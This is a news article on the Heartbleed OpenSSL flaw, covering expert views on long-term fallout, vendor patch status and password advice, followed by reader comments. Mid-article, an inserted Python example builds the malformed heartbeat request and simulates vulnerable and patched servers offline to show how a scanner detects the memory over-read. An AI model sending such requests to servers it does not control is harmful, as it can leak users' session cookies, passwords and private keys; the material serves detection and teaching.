Dark Reading is part of the Informa Tech Division of Informa PLC

Heartbleed Will Go On Even After The Updates

What's next now that the mindset is "assume the worst has already occurred"?

The fallout from the Heartbleed bug likely will be felt for a long time, but the immediate and urgent questions top of mind are which sites and products are affected, and which have been fixed. Then what? The scary reality is that even after a site or product is patched and users have changed their passwords, Heartbleed will not be over.

It is impossible to know whether nation-states or well-funded cyber-criminals already knew about and exploited the flaw during the roughly two years it has been present in OpenSSL (CVE-2014-0160, introduced in the 1.0.1 release and fixed in 1.0.1g). The bug also has a long tail that reaches into internal networks, applications, and some mobile devices. Server private keys may have been exposed, and the connection that was once considered reliable and secure, SSL/TLS, cannot be trusted on an affected server until it has been patched and rekeyed.

"OpenSSL is more than websites: it's server communications, products shipped with black boxes... those are going to take a while to update. Heartbleed is going to have a long-term effect and the industry is going to have to work pretty hard to fix it," says Barrett Lyon, founder and CTO of Defense.Net, a DDoS mitigation firm. "People are getting very diligent and updating things very quickly... But there are always going to be stragglers."

Dan Kaminsky, the security expert who discovered and coordinated the patching of the DNS cache-poisoning flaw in 2008, says the Heartbleed disclosure is a whole different ballgame. Kaminsky, co-founder and chief scientist at White Ops, says the traditional pattern has been that a bug is found and the message is simply: now go fix it.

"In the case of Heartbleed, the presumption is that it's already too late, that all information that could be extracted, has been extracted, and that pretty much everyone needs to execute emergency remediation procedures," Kaminsky said today in a blog post. "It's a significant change, to assume the worst has already occurred."

Adam Vincent, CEO of Cyber Squared, says Heartbleed is a "security-changing event" with far-reaching repercussions. First, cyber-espionage actors who recover a server's private key through the flaw can decrypt traffic they captured earlier under that key (unless those sessions used a forward-secret key exchange, in which case the stolen key lets an attacker impersonate the server going forward but not decrypt past captures). "They can find and retrieve the private key of a server that encrypted the traffic to begin with. If they have one to ten years' worth of traffic and were using that same private key, then they have encrypted content and have the private key to decrypt it," Vincent says.

Sophisticated and well-funded cyber-criminals could also use Heartbleed to gain a foothold on a vulnerable internal server at a corporation or government agency, Vincent notes, and write a program that harvests information from that server. Bad actors likely are already at work exploiting it: "I wouldn't be surprised if some sophisticated organization started pointing a sensor at vulnerable websites while [the site operators] were hustling to get them protected -- capturing as much information as they can on a large scale," he says. "The question is, how long have the bad guys known about [Heartbleed]?"

What to do now
The list of affected sites is a moving target, but several major sites have revealed their status. Amazon.com, Twitter.com, HootSuite, and LinkedIn say they were not affected by the flaw, but Pinterest, Tumblr, and Yahoo were. Mashable has published a checklist of the status of major sites.

Google says it had patched Google Search, Gmail, YouTube, Wallet, Play, Apps, and App Engine before the public Heartbleed announcement on Monday. Google Chrome, Chrome OS, and the newest Android versions are not affected. Android 4.1.1 is affected, according to Google, and its partners are receiving patch information.

Google Cloud SQL, Compute Engine, and the Search Appliance are in the process of being patched, according to Google. Facebook, meanwhile, patched before the Heartbleed disclosure. "We haven't detected any signs of suspicious account activity that would suggest a specific action, but we encourage people to take this opportunity to follow good practices and set up a unique password for your Facebook account that you don't use on other sites," a Facebook spokesperson said.

Amazon Web Services was affected and has been updated.

Several networking vendors have released updates for products that use the vulnerable OpenSSL versions (1.0.1 through 1.0.1f), including Cisco Systems, Juniper Networks, and F5 Networks. Software vendors Red Hat, Sophos, and VMware also have affected products. A full list with links to vendor updates is available from Carnegie Mellon's CERT Coordination Center.

In an analysis of cloud providers susceptible to Heartbleed, Skyhigh found that 368 providers, including top backup, human resources, security, collaboration, ERM, and storage providers, had still not updated their software 24 hours after the OpenSSL patch was issued.

Meanwhile, experts say, keep calm. Be aware that spammers are already using Heartbleed as a lure in spam and phishing emails about changing passwords, and don't rush to change a password until the affected site, service, or vendor has confirmed that it has patched the OpenSSL flaw, generated a new private key, and reissued its certificate (revoking the old one). A certificate reissued with the same key gains nothing, and a password changed over a still-vulnerable connection can simply be captured again.

There is now a free third-party Google Chrome extension called Chromebleed that screens the websites you visit for the Heartbleed vulnerability.
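The check that tools like Chromebleed perform is the same one a site operator can run against their own hosts before telling users to change passwords: send a heartbeat request whose payload_length field is larger than the payload actually sent and see whether the server echoes back more than it received. The following is an added example, not code from the Dark Reading article, from OpenSSL, or from Chromebleed. It builds that RFC 6520 request, models the vulnerable and the patched server behaviour against a constructed block of "adjacent process memory", and classifies the reply the way a scanner does. The server models, the memory contents, and all function names are constructed for illustration; nothing here touches the network.

```python
"""Heartbleed (CVE-2014-0160) probe logic, simulated offline.

Added example; not code from the article, from OpenSSL, or from Chromebleed.
The server models and the memory contents below are constructed stand-ins.
"""
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat (RFC 6520)
TLS_ALERT = 0x15
TLS_VERSION = b"\x03\x02"     # TLS 1.1 in the record header
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520 requires at least 16 bytes of padding


def _record(ctype: int, body: bytes) -> bytes:
    """Wrap a body in a TLS record header: content type, version, 16-bit length."""
    return struct.pack("!B2sH", ctype, TLS_VERSION, len(body)) + body


def _unwrap(record: bytes):
    """Split a TLS record into (content type, body)."""
    ctype, _ver, length = struct.unpack("!B2sH", record[:5])
    return ctype, record[5:5 + length]


def build_heartbeat_request(claimed_len: int, payload: bytes = b"") -> bytes:
    """Heartbeat request whose payload_length field may exceed the real payload.

    An honest client sets claimed_len == len(payload). A scanner sets it larger
    to learn whether the server trusts the field instead of the record length.
    """
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING
    return _record(TLS_HEARTBEAT, body)


def vulnerable_server(record: bytes, memory: bytes) -> bytes:
    """Models OpenSSL 1.0.1 through 1.0.1f: copies payload_length bytes from the
    start of the payload, trusting the client's field, so the copy runs off the
    end of the request into whatever sits next in memory (here `memory`)."""
    _, body = _unwrap(record)
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return b""
    heap = body + memory                 # request buffer followed by adjacent memory
    leaked = heap[3:3 + payload_len]     # over-read, bounded only by what we modelled
    resp = struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * MIN_PADDING
    return _record(TLS_HEARTBEAT, resp)


def patched_server(record: bytes, memory: bytes) -> bytes:
    """Models OpenSSL 1.0.1g: rejects any request where type + length field +
    claimed payload + minimum padding would exceed the record, and says nothing."""
    _, body = _unwrap(record)
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST or 1 + 2 + payload_len + MIN_PADDING > len(body):
        return b""                       # silently discard, per RFC 6520
    payload = body[3:3 + payload_len]
    resp = struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * MIN_PADDING
    return _record(TLS_HEARTBEAT, resp)


def classify_response(sent_payload: bytes, response: bytes) -> str:
    """'vulnerable' if the server echoed more than it was sent; 'not_vulnerable'
    if it dropped the request, sent an alert, or echoed exactly what it got."""
    if not response:
        return "not_vulnerable"
    ctype, body = _unwrap(response)
    if ctype == TLS_ALERT:
        return "not_vulnerable"
    if ctype != TLS_HEARTBEAT or len(body) < 3 or body[0] != HB_RESPONSE:
        return "unknown"
    payload_len = struct.unpack("!H", body[1:3])[0]
    echoed = body[3:3 + payload_len]
    if len(echoed) > len(sent_payload) and echoed.startswith(sent_payload):
        return "vulnerable"
    return "not_vulnerable"


def leaked_memory(sent_payload: bytes, response: bytes) -> bytes:
    """Bytes the server returned beyond the payload it was sent; empty if none."""
    if classify_response(sent_payload, response) != "vulnerable":
        return b""
    _, body = _unwrap(response)
    payload_len = struct.unpack("!H", body[1:3])[0]
    return body[3 + len(sent_payload):3 + payload_len]


def probe(server, memory: bytes, claimed_len: int = 0x4000, payload: bytes = b"ping") -> tuple:
    """One scanner round-trip against a modelled server: (verdict, leaked bytes)."""
    response = server(build_heartbeat_request(claimed_len, payload), memory)
    return classify_response(payload, response), leaked_memory(payload, response)


if __name__ == "__main__":
    # Constructed stand-in for whatever happens to sit next to the request buffer.
    neighbour = b"GET /login HTTP/1.1\r\nCookie: session=9f1c0e5ab2\r\n"
    for name, server in (("1.0.1f", vulnerable_server), ("1.0.1g", patched_server)):
        verdict, leak = probe(server, neighbour)
        print(f"{name}: {verdict}, {len(leak)} bytes beyond the sent payload")
```

Two things the model makes visible. The honest request (claimed_len equal to the real payload) gets the same four bytes back from both servers, so a scanner learns nothing unless it lies about the length. And the patched check compares the claimed length against the record length, not against the payload it was handed, which is why the fix is a single bounds test rather than a rewrite of the heartbeat handler.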

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...

User Rank: Apprentice
4/17/2014 | 10:09:14 PM
We must assume the worst
This flaw has been in circulation for years (plural).  It could have been exploited by anyone during that time.

It is unbelievable that nobody discovered this flaw until last week, especially since the source code is freely available.  There are many smart bad guys out there.

Everyone who is known to be affected must assume that all encrypted communication using keys stored or accessed via OpenSSL is compromised.

I agree that the repercussions will be felt for years.  
User Rank: Strategist
4/14/2014 | 2:06:15 PM
Protect Against Zero-day vulnerabilities
This may seem alarming to some but intelligence agencies are in the business of discovering, purchasing, and otherwise exploiting vulnerabilities. There are countless individuals and organizations that discover and sell zero-day vulnerabilities. Responsible disclosure practices are what allow customers to protect themselves against zero-day vulnerabilities. Many organizations who purchase zero-day vulnerabilities on the open market vet those from whom they purchase zero-day vulnerabilities and require that the researcher who finds the zero-day lives by responsible disclosure rules.
User Rank: Apprentice
4/14/2014 | 10:35:20 AM
It is 100% sure that Malsubjects will continue to use the Heartbleed Bug as one of the many tools in their toolbox to continue stealing information from out-of-date systems!
Tim Silverline,
User Rank: Apprentice
4/12/2014 | 12:06:17 PM
Re: We need proof
CloudFlare has now admitted that two hackers have accomplished the feat:
User Rank: Ninja
4/11/2014 | 3:56:00 PM
Re: We need proof
And they say they have put up a site for others to try and crack, so far no one has found any keys.  I can't seem to find anyone that can show a proof of concept where they have gotten the private keys yet.

Plenty of other data can be grabbed, but without the key to decrypt it what do you get?

Kelly Jackson Higgins,
User Rank: Strategist
4/11/2014 | 3:43:51 PM
Re: We need proof
CloudFlare just put up an interesting post looking at this very topic...how it's doable to grab the private key, but not easy. Basically, what Rob Graham of Errata Security said. http://blog.cloudflare.com/answering-the-critical-question-can-you-get-private-ssl-keys-using-heartbleed
User Rank: Ninja
4/11/2014 | 2:32:17 PM
We need proof
Has anyone anywhere been able to show that the private keys can actually be obtained?

Even the proof of concept exercises have not shown that any private keys can be obtained.

Please provide some providence for the claim that private keys have been compromised or even can be obtained.